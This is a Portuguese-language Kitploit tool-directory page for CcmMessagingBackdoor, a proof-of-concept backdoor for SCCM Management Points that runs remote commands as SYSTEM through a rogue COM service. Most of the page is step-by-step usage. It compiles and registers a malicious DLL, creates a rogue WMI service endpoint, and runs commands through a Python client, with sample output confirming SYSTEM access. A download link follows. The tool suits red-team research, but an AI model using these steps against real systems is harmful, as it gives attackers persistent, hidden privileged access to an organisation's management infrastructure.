Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/synacktiv/ccmmessagingbackdoor
Mecanismos de PersistênciaPós-ExploraçãoComando e ControleRed TeamingFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubsynacktiv/ccmmessagingbackdoor

CcmMessagingBackdoor

Backdoor de prova de conceito para o SCCM Management Point usando um serviço COM rogue para execução remota persistente de comandos como SYSTEM.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Ver Repositório
1924há 1 anoAinda não revisado
Compartilhar

CcmMessagingBackdoor

Ferramentas de prova de conceito para compilar e instalar um serviço CcmMessaging malicioso para manter acesso em um Management Point

Uso

  • Compilar e instalar o serviço COM malicioso no Management Point
root@kitploit:~
# Compile
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /t:library /out:c:\rogue.dll RogueCcmEndpoint.cs

# Register CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /codebase c:\rogue.dll
  • Configurar o endpoint do serviço no WMI
root@kitploit:~
PS C:\>  ./wmi_create_rogue_service_endpoint.ps1
  • Usar o cliente Python para executar comandos do PowerShell
root@kitploit:~
$ python3 ccmmessaging_backdoor_client.py -t https://mp.corp.local -s MP_Backdoor 'whoami'
[...]
<BackdoorResponse>nt authority\system
</BackdoorResponse>
  • Para limpar
root@kitploit:~
# Unregister CLSID
PS C:\> C:\Windows\Microsoft.NET\Framework64\v2.0.50727\RegAsm.exe /unregister c:\rogue.dll

PS C:\> ./wmi_remove_rogue_service_endpoint.ps1

TODO

  • Corrigir o crash aleatório do processo CcmExec (motivo desconhecido por enquanto)
Baixar ferramenta